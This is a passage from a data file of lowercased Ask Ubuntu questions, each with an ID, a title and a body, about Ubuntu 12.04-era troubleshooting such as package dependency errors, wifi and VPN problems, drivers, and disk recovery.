3.0.2-0ubuntu1 ) ; however : version of python-ubuntu-sso-client on system is 3.0.2-0ubuntu3 . ubuntu-sso-client-gtk depends on ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) ; however : version of ubuntu-sso-client on system is 3.0.2-0ubuntu3 . dpkg : error processing ubuntu-sso-client-gtk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of software-center : software-center depends on ubuntu-sso-client-gtk ; however : package ubuntu-sso-client-gtk is not configured yet . dpkg : error processing software-center ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ubuntu-sso-client-qt : ubuntu-sso-client-qt depends on python-ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) ; however : version of python-ubuntu-sso-client on system is 3.0.2-0ubuntu3 . ubuntu-sso-client-qt depends on ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) ; however : version of ubuntu-sso-client on system is 3.0.2-0ubuntu3 . dpkg : error processing ubuntu-sso-client-qt ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : ubuntu-sso-client-gtk software-center ubuntu-sso-client-qt e : sub-process /usr/bin/dpkg returned an error code ( 1 ) rich @ rich-latitude-d620 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : ubuntu-sso-client-gtk : depends : python-ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) but 3.0.2-0ubuntu3 is installed depends : ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) but 3.0.2-0ubuntu3 is installed ubuntu-sso-client-qt : depends : python-ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) but 3.0.2-0ubuntu3 is installed depends : ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) but 3.0.2-0ubuntu3 is installed e : unmet dependencies . try using -f. rich @ rich-latitude-d620 : ~ $
198002	how to retrieve files after hard drive crash ?	my hard disk was working fine . then suddenly after moving it from another room ( it is a laptop ) . i did what i found suggested as i feel the hd is a now dead but ? ? may be i can retrieve some files ? here 's the terminal output : ronald @ ronald-latitude-d505 : ~ $ dmesg | tail [ 14443.015575 ] sd 3:0:0:0 : [ sdb ] unhandled sense code [ 14443.015582 ] sd 3:0:0:0 : [ sdb ] result : hostbyte=did_error driverbyte=driver_sense [ 14443.015589 ] sd 3:0:0:0 : [ sdb ] sense key : hardware error [ current ] [ 14443.015596 ] info fld=0x0 [ 14443.015599 ] sd 3:0:0:0 : [ sdb ] add . sense : no additional sense information [ 14443.015607 ] sd 3:0:0:0 : [ sdb ] cdb : read ( 10 ) : 28 00 09 07 93 10 00 00 f0 00 [ 14443.015622 ] end_request : i/o error , dev sdb , sector 151491344 [ 14443.015670 ] jbd2 : failed to read block at offset 29039 [ 14443.015683 ] jbd2 : recovery failed [ 14443.015688 ] ext4-fs ( sdb1 ) : error loading journal ronald @ ronald-latitude-d505 : ~ $ what does anyone suggest ? i read this by installing a new hd and then connecting the `` broken '' one via a usb as an ext drive .
198006	installing brother dcp-7030 - aa-complain : command not found	i 've only been using ubuntu for a few months now ( 12.04 lts ) , and decided to try to install my printer . running through the instructions on the brother website though has me stuck . from : http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/before.html # 002 pre-required procedure ( 2 ) related distributions ubuntu8.04 or greater related products/drivers cupswrapper printer/pc-fax drivers requirement 1 . `` sudo aa-complain cupsd '' command is required before the installation . 2 . `` sudo mkdir /usr/share/cups/model '' command ( as it is ) is required before the installation . problem is , sudo aa-complain cupsd only returns sudo : aa-complain : command not found . what am i missing ? is there something i should be doing before this ? is it necessary in 12.04 , or are these instructions outdated ? again , i 'm pretty new to linux , so the more information the community can provide the better . thanks in advance .
198008	what 's the fs type for mounting an existing ubuntu partition ?	trying to repair the usual broken ubuntu i try chrooting following directions from this page however when i arrive to the mounting step where i need to mount the existing extended broken linux partition i ca n't because do n't know the type and there are many . i tried ext , ext2 , ext3 , ext4 ... none work . the type is also not optional if i leave it empty i get mount : you must specify the filesystem type what is the type of choice to mount an existing linux 11.10 partition ?
198010	i can not find .minecraft folder to install mods	i 'm kinda new on this , and need some help . i had mc on my windows with mods , when changing to ubuntu i got the same version . i tried to install the mods i had on my windows but i can not make it work , because there 's no .minecraft file nor % appdata % . i followed instructions like copying modloader into the .jar file , which did n't work and other stuff can you help me , please ?
198013	reset video driver to original ubuntu driver	i have an nvidia and i installed the latest drivers from the nvidia web site . i then forgot to uninstall the driver before taking tons of updates and ended with an unbootable ubuntu installation . following directions from this page i managed to mount and get into the broken ubuntu installation using the ubuntu 11.10 livecd . now the question is how can i remove the nvidia driver and reset it to the original ubuntu installation via this chrooting access ? for example , if i run the steps here it wo n't work because the commands apply to the host running ubuntu which is the one from the livecd and not the one i need to repair .
198014	install google chrome ubuntu 12.04 without sudo	i was wondering if i could install google chrome without using the sudo command . i 've tried to use the tutorials from google but i could n't read it because i accidently downloaded the french version of ubuntu , so i basically do n't know what 's happening , also , i 'm a complete noob at ubuntu ... so if anyone could give me a very very basic tutorial on how to do it , it would be appreciated . thanks in advance .
198015	screen dpi - is there and equivalent command/action to windows 150 % display	i have a wide screen of high resolution and i see everything small on it . so in windows i set the display to 150 % , i would like to do something similar in ubuntu . simply changing screen resolution to lower resolution does n't help because ubuntu is in a virtual machine and it simply changes the vm window to the actual resolution . is there a command or a simple hack that can do the trick ? edit : i am running ubuntu as a virtualbox vm on windows 7 host .
198016	unity 3d or gnome 3 does n't work with intel card ( switchable graphics )	i have a system with switchable graphics : an ati radeon hd 6770m , and an intel hd 3000 . i installed the driver from additional-drivers . the post release updates one was unable to be installed , so i simply installed the other one . everything works fine with the amd card . the problem is when i switch to the intel card to get more battery life , i have to use gnome classic or unity 2d . unity 3d or gnome 3 does not work . it just shows my desktop background and nothing else . does anyone have a solution for this ? thank you in advance . i have ubuntu 12.04 lts 64-bit . edit : i have uninstalled unity , so my objective is to get gnome 3 working with my intel card .
198020	disable automatic starting of sshd ?	simple question here ; what 's the correct way to stop the sshd service from starting when the os boots ? i 'm not sure if this answer is correct , so i 'm hoping some guru ( s ) can help me out ! what i 'd like is a configuration that ( after boot ) allows me to start the service using sudo service ssh start when necessary . version info : me @ home : ~ $ ssh -v openssh_5.9p1 debian-5ubuntu1 , openssl 1.0.1 14 mar 2012 me @ home : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise
198022	no sound on tv via hdmi	i ca n't get sound to my tv which i connected via hdmi cable to my hp pavilion g6 laptop running under os ubuntu 12.04-64bit . i checked this post which indicates a solution , but i do n't know how to do it .
198024	how is the ubuntu installation supposed to work ?	i have given up on installing ubuntu 12.04.01 for the sixth time . i finally got windows xp to work again . so i blitzted the ubuntu partition and the swap partition and was about to install the sixth try when it occurred to me that ought to ask how is is `` supposed '' to go . my installer will install ubuntu on the linus ext4 partition i created by hand in windows on my c drive . but the installer keeps insisting on installing the os on my d drive unless i intervene . so if i choose `` do something else '' it will accept installing ubuntu on the c drive in the partition i previously created , but it insists on putting the `` device for boot loader installation '' on the d drive . i can select a different drive at this point ( where i could not with the `` along side windows choice ) but what drive to i choose ? ? ? it lists sda , sda1 , sda5 , sdb and sdb1 . the five times before this all ended in disaster letting the installer choose . so i need human intervention . where is the safe place to do this . the results from the previous attempts left me with only the ubuntu that would boot , the boot to windows from the grub menu failed every time . is there a better version of ubuntu i can use ? is v12.04.01 messed up ? my goal is still to use wine on it to run pc programs . i would like to find a shell or skin or something that makes it seem like windows but have the security and power of linux under the good . i have seen this type of system and it worked very well . i know i am getting long winded but i have been though at least four of the seven rings of hell already , so i want this install to be the last .
198037	wine settings to correct color palette ?	i have a windows application ( kidspiration 3 starter ) , that when running under wine 1.4 in ubuntu 12.04 shows a completely distorted color palette that makes the interface unusable . see screenshot . what is usually the way to correct this ? is there a particular wine library that i should switch to native ? other details : winehq list kidspiration 2.1 as `` garbage '' , however version 3 installation and program works , except for the colors .
198042	is there a way to force lubuntu screen resolution ?	i have a dell inspiron 4000 , 900 mhz pentium iii , 192 mb ram , 10.1 gb disk running lubuntu 12.04 . when i start the computer , and i check the display resolution , monitor settings claims that the max resolution is 1024x768 . i then connected another monitor i had lying around , rebooted , and now the laptop monitor looks normal , and monitor settings claims that 1280x1024 is the max resolution ( it is ) and the other monitor does n't turn on . ( black screen ) the external monitor is not broken . is there a way to , without the external monitor , force the laptop monitor resolution to 1280x1024 ? ( the following is another question ) - how can you run commands automatically at startup ? specifically , xinput 18 118 0 . the first question is important , i can live with typing the second one at every boot . thanks
198043	update to grub2.x broke xubuntu 12.04 client in virtualbox	i have virtualbox-4.1 installed in ubuntu 10.04 with a .vdi running xubuntu 12.04 . recently , a grub update for xubuntu 12.04 to grub2.x , broke it with the following explanation : error : elf header smaller than expected grub rescue > _ is there an easy fix for this ? i could reinstall , but i tweaked xubuntu 12.04 to my liking , and do n't want to re-install a new .vdi . unfortunately , i did n't make a snapshot of it . google results , have been over my head .
198047	how to remove soft blocks permanently in ubuntu 12.04 lts ?	i am using ubuntu 12.04 lts on an asus eee pc 1000ha . since i upgraded to 12.04 , i have had problems connecting to wifi . when i fly , i need to disable wifi . when i try to reconnect , the `` enable networking '' option is no longer available . if i type in the terminal rfkill list , the following shows up : 0 : eeepc-wlan : wireless lan soft blocked : yes hard blocked : no if i type rfkill unblock all , `` enable networking '' will become available and i am able to connect to wifi . how can i permanently remove this annoying soft block ? i do n't want to be typing up two lines of code . any help would be greatly appreciated .
198048	does the lense for videos search youtube correctly	when i search in youtube.com for `` erika tipo 11 '' i get videos about the actual show . when i do the same using the dash video lense i get anything else except the actual show . i mean i even get chinesse stuff , some yoga lessons and anything very out there that is not even remotely related to the show . now my questions are : does the video lense search in a similar way as searching in youtube/vimeo/any other video site ? is there an option apart from the filter settings to configure the behavior of the search so it searches in a similar way as one would do when searching from the actual site .
198050	ubuntu 12.04 - syslog showing `` sgi xfs with acls , security attributes , realtime , large block/inode numbers , no debug enabled ''	i have been seeing these random logs in syslog on our production system . there is no xfs setup . fstab only shows local partitions , only ext3 . there is nothing in crontabs either . the only file system related package i have installed is 'nfs-kernel-server ' kernel version is 3.2.0-31-generic . kernel : [ 601730.795990 ] sgi xfs with acls , security attributes , realtime , large block/inode numbers , no debug enabled kernel : [ 601730.798710 ] sgi xfs quota management subsystem kernel : [ 601730.828493 ] jfs : ntxblock = 8192 , ntxlock = 65536 kernel : [ 601730.897024 ] ntfs driver 2.1.30 [ flags : r/o module ] . kernel : [ 601730.964412 ] qnx4 filesystem 0.2.3 registered . kernel : [ 601731.035679 ] btrfs loaded os-prober : debug : running /usr/lib/os-probes/mounted/10freedos on mounted /dev/vda1 10freedos : debug : /dev/vda1 is not a fat partition : exiting os-prober : debug : running /usr/lib/os-probes/mounted/10qnx on mounted /dev/vda1 10qnx : debug : /dev/vda1 is not a qnx4 partition : exiting os-prober : debug : running /usr/lib/os-probes/mounted/20macosx on mounted /dev/vda1 macosx-prober : debug : /dev/vda1 is not an hfs+ partition : exiting os-prober : debug : running /usr/lib/os-probes/mounted/20microsoft on mounted /dev/vda1 20microsoft : debug : /dev/vda1 is not a ms partition : exiting os-prober : debug : running /usr/lib/os-probes/mounted/30utility on mounted /dev/vda1 30utility : debug : /dev/vda1 is not a fat partition : exiting os-prober : debug : running /usr/lib/os-probes/mounted/40lsb on mounted /dev/vda1 debug : running /usr/lib/os-probes/mounted/70hurd on mounted /dev/vda1 debug : running /usr/lib/os-probes/mounted/80minix on mounted /dev/vda1 debug : running /usr/lib/os-probes/mounted/83haiku on mounted /dev/vda1 83haiku : debug : /dev/vda1 is not a befs partition : exiting os-prober : debug : running /usr/lib/os-probes/mounted/90bsd-distro on mounted /dev/vda1 83haikuos-prober : debug : running /usr/lib/os-probes/mounted/90linux-distro on mounted /dev/vda1 os-prober : debug : running /usr/lib/os-probes/mounted/90solaris on mounted /dev/vda1 os-prober : debug : /dev/vda2 : is active swap why would this randomly show up ? this also spawns multiple `` jfscommit '' processes .
198052	how do i get my vpn to work even when my firewall is active ?	i have subscribed to a vpn service , but it seems that it does not work whenever my firewall is active . i have up until now used firestarter to configure my firewall , but it has no options for allowing a vpn connection . nor does gufw . what do i do to keep my firewall active , and still be able to connect to my vpn ?
198053	wireless driver not working under 'old ' linux kernel	this is my first post in the forums . i have tried many different distros , including ubuntu , lubuntu , xubuntu , linux mint , peppermint os , etc , and with all of them , i have had the same results . ever since installing ubuntu , i faced problems with getting my wireless card to work . the network manager applet would tell me that i was connected with a wireless port , but i would still be unable to use the internet ( browsers returning `` not connected to network '' ) . the problem exists with every ubuntu-based distro i tried . my wireless card is an rt3090bc4 card . even after installing the driver packages from the manufacturer , my wifi card would still fail to get me connected to my room 's wifi , though it would continue to tell me that it was connected . very recently , i realized that updating my kernel to versions over 3.4 would get my wifi card to work . however , installing ubuntu 's mainline kernels seem to cause heating on my laptop 's cpu and hard drive . the heating only seems to exist when the laptop is conncected to ac . is there a way to go back to kernel 3.2 , while keeping my wifi driver functional ? or is there a method to cool down my laptop , even when i am charging ? ( my laptop does n't heat up when i run windows 7 . ) thanks !
198057	automatically disable a ppa	is there a way to automatically delete or disable a ppa that does not work anymore ? when i do apt-get update i get a lot of error message regarding some ppas that cant be found . i have disabled them by hand for now , but is there a way to disable them automatically ? since i have many ppas it is a lot of work to search and disable them by hand .
198059	how to edit unity multitouch gestures ?	i ca n't find a way to modify the touchpad gestures unity uses by default on ubuntu 12.04/12.10 . tried with ginn , but it shows error subscribing to gestures and it seems because of unity . is there a way of customize the trackpad gestures of unity ?
198060	ipod suddenly stopped working with ubuntu	until recently , my ipod has connected to ubuntu with no problems , but a couple days ago it is no longer able to do so . the ipod mounts when connected , but it mounts to a random folder in /tmp and is not recognized by any programs . if i manually unmount it and mount it in /media , it 's recognized . however , trying to do anything with it crashes whatever program i 'm trying to use ( in particular , rhythmbox , which has been my preferred program to use with the ipod so far ) . however , if i go into the device , the files can be played ( with , say , vlc ) fine . it 's only causing issues when using programs that treat it as a music player . floola says that the ipod is write-only , but i set the fstab entry to rw and umask=000 . earlier , after upgrading to 12.04 , i had some issues with loading podcasts onto the ipod , prompting this question here . this problem started a couple days after that one was solved . i have no idea if they are related , but it seemed worth considering . other than that , i ca n't recall changing anything , except perhaps to install ubuntu updates once or twice .
198061	how do i report a bug against compiz ?	when running gui unit tests with netbeans , i usually end up in a situation where compiz reaches 100 % of cpu usage . when that happens , unity freezes completely , but i can connect to my computer through ssh and kill compiz ( with sudo killall -9 compiz ) . i would like this bug to be solved , but i do n't know which is the best way to collect useful information about it . can anyone tell me what to do ? maybe starting/killing compiz in a different way to get a stack trace ?
198062	does installing to an extended partition reduce disk performance ?	i was reading the latest issue of full circle ( issue 63 ) and there was an article comparing boot times under various configurations . one of the comparisons was with an installation in a primary partition and with an extended partition . now , i was shocked to see a graph see significant increases in boot times when the system was installed on an extended partition . quickly after , suspicion set in : how is it that simply being in a workaround environment to get around the limitations on the number of partitions allowed magically decreases i/o performance ? is there something i 'm missing ? text from the article : to my mind , the internal hard drive and the sd card represent just about the respective best and worst physical speeds available for our test computer . at the same time , i also wanted to know if using a primary hard drive partition ( /dev/sda1 ) or an extended partition ( /dev/sda5 ) had any effect at all . what i got is shown [ below ] .
198065	how to format a usb drive ?	how to format a pen drive in ubuntu 12.04 ? i have this pen drive which i made bootable using some other system ( os ) . but i need to format it now in my ubuntu 12.04 . on right click there is no option to format it . please guide me .
198072	where is the source code of calculator apps in ubuntu ?	where is the source code of the calculator apps in ubuntu located ? how to edit the source code so that it is possible to add new features by writing some code .
198074	how to stop ubuntu 12.10 wireless from dropping out	appreciate any help . i upgraded to ubuntu 12.10 and it 's been a nightmare on my wireless connections . was fine with release 12.04 . i knew i should n't have started chasing rainbows but the hype was too much to pass up : ) i first noticed it with my droid razor hotspot connection ... then my uml290 pantech with a cradlepoint router and finally i just happen to have a freebie upgrade coming my way and got the verizon 's 4g lte -890l-3d65 last week and the same issue ( wireless connection keeps dropping out ..sometimes i go for an hour or two , other times a few minutes . no rhyme or reason . i tested the same on my other pcs with window 7 and xp on the same devices and the connections were/are rock solid . i chased down a few hits on the net but nothing really seem to work consistently and because i use vpn on these computers..was n't sure to try the wicd . i 'm relatively new to linux anyways so i did n't want to push my luck . was hoping to put this behind me when the final release comes out soon ? any ideals ? btw , i use the ethernet connection and no issues . any promises on the final release or perhaps an easy fix that i overlooked ? there 's no obvious disconnects.. i notice the bars go down a couple notches and i 'm done . sometimes the bars are full and i 'm still done . i wait a couple minutes and it 's back up again maybe for a few minutes ... maybe even 30 minutes ... but the connection will drop ... it 's aggravating . thanks ,
198077	how to install vlc 's nightly builds ?	hello guys , i have already installed stable version of vlc from ubuntu software center . but i would like to try the latest beta vlc media player nightly builds http : //nightlies.videolan.org/ # ubuntu < -- these ones how can i do it ? ty regards : )
198079	problem in redirecting standard input and output	i want to take backup of my mysql data using mysqldump . i have three files containing names of mysql tables line by line . my script has this line - mysqldump -h localhost -uroot -- lock-tables=false db < $ 2 > ~/backup/ $ name'.sql' i am using getopts to handle some options . so basically $ 2 is the file i am going to provide . this file has - table1 and table2 . so this command should only take backup of these two tables . but when i cat the ~/backup/name.sql file it shows all the backup of db . i am not sure if it is the combined backup of all the tables from all the 3 files or the whole db . but it is taking backup of whole db instead of two tables . what am i doing wrong ? it works fine when i put it like this - mysqldump -h localhost -uroot -- lock-tables=false db table1 table2 > ~/backup/ $ name'.sql'
198080	how to change sort order for mail in thunderbird	i am using ubuntu 12.04 and thunderbird came installed by default . i found that the mail in my inbox are sorted from oldest to newest and need to scroll to the bottom to find the latest mail . is there any setting to sort the newest mail at the top and the oldest to the bottom .
198082	start idea from menu	i trying to run idea from dash menu . so i 've create .desktop file for it and put it to /usr/share/applications : $ cat /usr/share/applications/idea.desktop [ desktop entry ] name=idea comment=intellij idea exec=/opt/idea/bin/idea.sh icon=/opt/idea/bin/idea.png terminal=0 type=application encoding=utf-8 categories=development ; ide ; java ; $ ls -l /usr/share/applications/idea.desktop -rw-rw-r -- 1 root root 179 oct 3 11:01 /usr/share/applications/idea.desktop when i type idea in dash i can see idea 's icon , but when i click on it application not start . in the same time if i run /opt/idea/bin/idea.sh from console , it will run . how to solve ( or debug ) this problem ?
198084	how to uninstall postgresql installed from .run file ?	i am a new ubuntu 12.04 user and i 'm using 64bit . this morning i installed posgresql 9.2 from the graphical installer ( not from ubuntu repository ) . now i want to uninstall it , but i do n't know how . anyone please show me the way out ?
198101	a 16gb file with 1204 extents . is it normal ?	i noticed slow disk performance running a vm in virtualbox . filefrag shows 1204 extends for the virtual disk file . i know file fragmentation only occurs when necessary , but i wondering if this is a correct value or if the file needs some kind of defrag .
198103	sound input device not detected in laptop	i have a vaio vpcea23en laptop with ubuntu 12.04 . its unable to detect sound input hardware . how can i fix the problem . here is the screenshot of my sound input tab .
198104	problems in wlan ubuntu 12.04 lts	i have problems in connecting to internet via my wlan . i had ubuntu 10.04 lts initially which i recently upgraded to 12.04 lts , the problem existed from the earlier version . i can connect to internet with a ethernet . i am able to scan for the available wlans . also i can connect to a wlan of my choice . but i am unable to access internet . so i am afraid i might have misconfigured something . any pointers on what would have went wrong ? . additional information : $ nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ mywlan ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : 00:1e:65:94:11:86 capabilities : speed : 6 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) mywlan5 : infra , 00:24:01:38 : bc:6b , freq 5240 mhz , rate 54 mb/s , strength 54 wpa wpa2 ... ... ... ... ... ... . ... ... ... ... ... ... . ssfwlan : infra , 00:16:01 : af:38:33 , freq 2422 mhz , rate 54 mb/s , strength 24 wpa androidap : infra , 04:46:65:4a : b6:5d , freq 2437 mhz , rate 54 mb/s , strength 97 wpa *mywlan : infra , 00:24:01:38 : bc:69 , freq 2457 mhz , rate 54 mb/s , strength 75 wpa wpa2 ipv4 settings : address : 192.168.0.154 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unmanaged default : no hw address : 00:22:68:11 : d4 : f8 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on $ lspci -nnk | grep -ia2 net 00:19.0 ethernet controller [ 0200 ] : intel corporation 82567lf gigabit network connection [ 8086:10bf ] ( rev 03 ) subsystem : lenovo device [ 17aa:20ee ] kernel driver in use : e1000e -- 03:00.0 network controller [ 0280 ] : intel corporation pro/wireless 5100 agn [ shiloh ] network connection [ 8086:4237 ] subsystem : intel corporation wifi link 5100 agn [ 8086:1211 ] kernel driver in use : iwlwifi $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 $ ping -c4 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . from 192.168.0.172 icmp_seq=1 destination host unreachable from 192.168.0.172 icmp_seq=2 destination host unreachable -- - 192.168.0.1 ping statistics -- - 4 packets transmitted , 0 received , +2 errors , 100 % packet loss , time 3005ms pipe 2 $ ping -c4 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=50 time=39.3 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=50 time=121 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=50 time=41.9 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=50 time=37.8 ms -- - 8.8.8.8 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3002ms rtt min/avg/max/mdev = 37.808/60.048/121.087/35.271 ms
198105	glade crashes when running `` quickly design ''	when i run quikly design glade opens and starts loading all my ui files . after a few seconds of loading each file it crashes silently ( no error message or command line output ) . the glade window is just gone . running glade normally does n't result in a crash . running it this way , however , without running quickly design i am obviously not able to graphically edit my application 's gui using glade . i have tried re-installing ( and purging ) quikly and all its dependancies with no luck . i have also tried creating a fresh blank new application ( using the quickly create ubuntu-applicationcommand ) with the same results - i.e . glade crashes silently . in addition i have tried my best at some googling to resolve this problem , with no results . i am running an updated ubuntu 12.04 with unity removed and kde installed ( from the kde backports ppa ) .
198106	ftp connection established ... connection timed out problem with all my sites and ftp programs ?	just few hours ago filezilla was working fine . then , suddenly i started to get this error : status : resolving address of ftp.readtypechinese.com status : connecting to 69.175.14.60:21 ... status : connection established , waiting for welcome message ... error : connection timed out error : could not connect to server and it happens with all my sites : status : resolving address of edasich.dreamhost.com status : connecting to 173.236.223.223:21 ... status : connection established , waiting for welcome message ... error : connection timed out error : could not connect to server i 'm using filezilla 3.5.0 and ubuntu 11.10 . any suggestions to fix this ? ( i already tried passive mode and it does n't work ) . edit : ocasionally , the log goes beyond the ... waiting for welcome message : status : connection established , waiting for welcome message ... response : 220 dreamhost ftp server command : user aleche23 error : connection timed out error : could not connect to server but the connection gets timed out again . weird ... i just realized that i have the same problems with other ftp programs too : gftp : looking up ftp.readtypechinese.com trying readtypechinese.com:21 connected to readtypechinese.com:21 220 proftpd 1.3.2 server ( server ) [ 69.175.14.60 ] user admin @ readtypechinese.com connection to ftp.readtypechinese.com timed out
198107	need a graphical renaming tool which can rename files recursively	atm i am forced to use freeware in windows to rename some linux data files . linux also creates files like `` filename.ext '' as being different to `` filename.ext '' , and ! @ # $ hg '' .ext ... which can not be recognized by windows . `` pyrenamer '' ... mentioned in another answer can not auto-rename more than the one immediate folder . i use ubuntu , not arch linux , because i am not cli . despite some answers here ( designed by and for cli programmers ) , how can ubuntu gui ( not cli ) do file renaming ? bty : in one folder only , thunar is far better than silly pyrenamer . but thunar can not auto-rename recursively .
198108	brightness controll not working in lenovo g580	my laptop is lenovo g580 . configuration is cpu : intel® core™ i3-2370m cpu @ 2.40ghz × 4 gpu : nvidia geforce 610m kernel linux 3.5.0-17-generic my problem is that i can not control the screen brightness . when i try to control the brightness using ( fn + up/down ) the pop-up notification on the right top of the screen comes but the brightness does not change . when i installed ubuntu for the first time the brightness control worked properly . but after the first reboot brightness not changing . then i installed kernel 3.5 . after that also the brightness control worked properly . but after the first reboot brightness not changing . now i observed that brightness control works well after the very first reboot of kernel update ( update-initramfs -u ) . what may be the reason ? thanks in advance .
198110	how to search for strings inside files in a folder ?	is there any utility to make searches for a string inside ascii files to avoid command line searches ? how to make a command line search , for example for the string `` test '' inside all files in the directory /var/x/ ?
198115	how to disable the notification for additional driver	we have chosen to use the nouveau driver for our pcs with nvidia graphic cards . unfortunately every user who gets connected to those pcs get the message `` additional drivers available '' ... even if they do n't have the right to install it . how could i disable these notifications ?
198121	ubuntu , windows 7 and virtualization	i have a windows 7 and ubuntu 12.04 installed on my machine . i 'd like to know if it 's possible to start my windows 7 from within an opened ubuntu session . the same way i would open a virtual machine with virtual box , but without having to create a virtual machine ( why would i recreate a windows 7 installation ( approx 25gb ) , when i already have one installed on my computer ... ? ) i need to do some tests with ie9 and the other windows browsers ...
198125	disable/remove cinnamon keyboard shortcurts	i installed cinnamon on ubuntu 12.04 using sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon now i am looking for a way to disable the keyboard shortcuts altf7 ( move window ) and altf8 ( resize windows ) . i already disabled those key bindings under keyboard - > shortcuts . this has no effect . i did not find them in gconf-editor under apps - > muffin . i already tried to disable them under apps > metacity > global_keybindings and window_keybindings which has no effect ( although i thought cinnamon uses muffin and not metacity ) does anybody know how to remove/edit/disable those key bindings ?
198128	thunar custom action to open as root	thunar has an option to add context menu custom actions to open terminal , or to open folders and files in different applications . could it be possible to add a menu custom action that would open thunar itself as root ?
198129	not able to cd into samba location ( in a windows share location )	i am not able to cd into the samba like i would normally do : cd smb : //server/folder it says : `` bash : cd : smb/ ... '' no such file or directory . but if in nautilus i go to the folder and right click it , the location shown in the properties is : smb : //server/folder why is n't this working ? thanks
198132	zte usb modem ac2726 , connection not possible in ubuntu 12.04.1 lts	it 's a long post but nearly covers all my experiments and changes i did to my nm . hope the information is complete and if there are still question , more information can be provided . i 've a zte ac2726 usb modem ( cdma modem ) which worked fine in ubuntu 10.04 /11.10 . i recently switched to 12.04.1 ( precise pangolin ) all 32-bit . after the switch the first issue i faced was to connect to internet using my usb modem ( isp : reliance brand : netconnect ) . tried to run the drivers provided by reliance but they are old and wo n't support kernel 2.6.30 above . since the code was not downloaded with iso image ( of 12.04 ) i could n't compile the files provided in such driver . lsusb does detect it as modem with output similar to 19d2 : fff1 zte cdma technologies inc. ( or similar as i did n't note it down ) if it is detected as usb storage it shows 19d2 : fff5 ( as per few online forums , i may be wrong here ) . i used the network manager and configured the modem to dial # 777 ( default ) and the isp provided username : password combination . it tries to connect to internet ( 3-4 times automatically ) but fails to get online . once i was able to connect in the monring hours and the message was flashed 'registered on cdma home network ' . i was able to run an update . the kernel was updated with 3.0.2 -pae or something similar ( can find out if required ) . i surfed the net for about 2 hours later before restarting . after the restart , again the modem was not able to get me online . i kept trying for many times . i tried changing the setting in nm . one evening after dark i was able to connect to network with same message flash 'registered on cdma home network ' ( the message was similar , i 'm not precise here , sorry ) . i was able to surf the net for nearly 3 hours before i switched off my laptop . i 'm not able to get online after that day , it 's been 3 days now . i 'll try the observered theory of late/early hours sometime soon as mentioned below . laptop configuration : make : lenovo model : b480 processor : intel b950 ram : 4g ddr3 hdd : 500 g broadcom wireless/bluetooth/ethernet lan os : freedos / ubuntu 12.04 lts ( dualboot ) - 32 bit kernel 3.0.2-pae -32-bit isp : reliance communication ( india ) usb modem : zte ac2726 ( black/silver ) obeservation : i 'm able to connect to internet in those hours when generally the speed is high ( low usage by other network ( wireless ) users ) . like in early mornings or late nights . this is strange as connection should not be dependent on bandwidth usage . any help would be appraciated to fix this issue . before i decide to cahnge the os or isp .
198136	error when trying to connect to vpn on startup	this question has been updated . please see the tail end of this post . i am trying to set up my mythbuntu computer to connect to a vpn service when it starts up . my hope is that the mythbuntu computer will always use the vpn for all of its internet connections . i found a script that will supposedly do that , and it looks like this : # ! /bin/bash while [ `` true '' ] do vpncon= $ ( nmcli con status ) if [ [ $ vpncon ! = `` *myvpnconnectionname* '' ] ] ; then echo `` disconnected , trying to reconnect ... '' ( sleep 1s & & nmcli con up uuid df648abc-d8f7-4ce4-bdd6-3e12cdf0f494 ) else echo `` already connected ! '' fi sleep 30 done when i run this script on my machine , i get the following error : $ /home/mythbuntu/vpn_start.sh disconnected , trying to reconnect ... error : connection activation failed : not authorized to control networking . i thought it might be a permission issue , so i tried running it with sudo : $ sudo /home/mythbuntu/vpn_start.sh [ sudo ] password for mythbuntu : disconnected , trying to reconnect ... active connection state : unknown active connection path : /org/freedesktop/networkmanager/activeconnection/1 state : vpn connecting ( need authentication ) ( 2 ) error : connection activation failed : no valid vpn secrets . how do i get this script to run without errors so that i can run it at boot or login so that i can make sure i 'm always connecting by vpn . if anyone has a better script or method , that would also suffice as an answer . these are the contents of my 